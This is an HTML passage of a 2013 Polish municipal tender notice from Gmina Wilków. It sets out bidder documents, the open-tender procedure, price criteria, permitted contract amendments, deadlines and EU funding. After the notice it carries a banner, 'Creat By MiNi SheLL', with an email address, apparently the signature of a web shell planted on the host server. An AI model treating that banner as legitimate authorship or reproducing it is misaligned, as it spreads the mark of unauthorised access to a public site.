<p>1. W przypadku polegania na zasobach innych podmiotów na zasadach określonych w art. 26 ust 2b ustawy, Wykonawca musi przedstawić pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia .

2. Jeżeli Wykonawca ,wykazując spełnienie warunków , o których mowa w art.22 ust.1 ustawy ,polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy , Zamawiający żąda dokumentów dotyczących w szczególności :
     1) zakresu dostępnych wykonawcy zasobów innego podmiotu,
     2)sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę przy wykonywaniu zamówienia,
     3)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
  4)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

 3. wypełniony formularz oferty,
     4. pełnomocnictwo - w przypadku, gdy wykonawcę reprezentuje pełnomocnik,        posiadające zakres i podpisane przez osoby reprezentujące wykonawcę ,
 5. dowód wniesienia wadium,
 6. określenie części zamówienia, którą Wykonawca powierzy podwykonawcy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany zakresu zamówienia spowodowane zmianą dokumentacji technicznej, skorygowanej przez projektanta i zaakceptowanej przez Zamawiającego.
     2.Zmiana sposobu wykonania zamówienia, materiałów budowlanych, sprzętu, urządzeń , gdy wykorzystanie materiałów budowlanych, sprzętu ,urządzeń wskazanych w dokumentacji projektowej lub w ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym , zwiększeniem bezpieczeństwa na budowie. Zmiana pod warunkiem nie zwiększenia ceny.
     3. Zmiana załącznika Nr 1 do umowy harmonogram rzeczowo-finansowy,                            4. Zmiana terminu realizacji przedmiotu zamówienia w przypadku:
      1) przedłużającej się procedury wyboru najkorzystniejszej oferty
      2) działania siły wyższej ,
   3)zaistnienia niesprzyjających warunków atmosferycznych uniemożliwiających     wykonanie robót w określonym pierwotnie terminie,
      4)błędów w dokumentacji projektowej, konieczność uzyskania decyzji lub uzgodnień,   konieczność uzyskania dodatkowych badań i ekspertyz, prac lub badań archeologicznych,
     5) znalezienie niewybuchów i niewypałów, 
     6) wystąpienie odmiennych od zakładanych warunków geologicznych i terenowych

Na wyżej wymienione zmiany Zamawiający musi wyrazić zgodę .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wilkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać po uprzednim złożeniu wniosku z danymi tele-adresowymi : osobiście w Urzędzie Gminy w Wilkowie,ul. Wrocławska 11, 46-113 Wilków.SIWZ jest odpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2013 godzina 09:00, miejsce: Oferty należy składać przesyłać w zamkniętej kopercie w pok. 9A(SEKRETARIAT) Urzędu Gminy w Wilkowie, ul. Wrocławska 11,46-113 Wilków..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający podpisał umowę o przyznanie pomocy w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich                na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com